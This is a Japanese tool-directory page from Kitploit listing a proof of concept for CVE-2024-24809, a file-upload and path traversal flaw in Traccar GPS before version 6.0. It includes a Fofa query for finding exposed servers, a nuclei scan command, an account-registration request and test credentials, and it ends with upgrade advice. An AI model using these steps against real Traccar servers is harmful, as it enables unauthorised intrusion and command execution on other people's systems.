Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/gh-ost00/cve-2024-24809-proof-of-concept
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集フィッシングペネトレーションテスト
GitHubgh-ost00/cve-2024-24809-proof-of-concept

CVE-2024-24809-Proof-of-concept

Traccar GPSシステムの重大な欠陥がユーザーをリモート攻撃に晒す

リポジトリを見る
512年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-24809 詳細

#説明 TraccarはオープンソースのGPS追跡システムです。6.0より前のバージョンは、パストラバーサルおよび危険なタイプのファイルの無制限アップロードに対して脆弱です。システムはデフォルトで登録を許可しているため、攻撃者はアカウントを登録して通常ユーザー権限を取得し、この脆弱性を悪用して任意のフォルダにプレフィックスdevice.を持つファイルをアップロードできます。攻撃者はこの脆弱性をフィッシング、クロスサイトスクリプティング攻撃、およびサーバー上での任意のコマンド実行に使用する可能性があります。バージョン6.0にはこの問題のパッチが含まれています。

#使用方法

root@kitploit:~
Fofa query : app="traccar"
root@kitploit:~
nuclei --target {target.com} -t CVE-2024-24809.yaml

#概念実証 (Burp Suite使用)

root@kitploit:~
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}

#テストアカウント

root@kitploit:~
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"

修正方法は?

org.traccar:traccarをバージョン6.0以上にアップグレードしてください。

ツールをダウンロード